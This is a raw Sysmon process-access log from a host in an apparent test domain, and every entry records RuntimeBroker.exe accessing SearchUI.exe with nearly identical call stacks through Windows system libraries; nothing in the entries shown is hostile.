13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 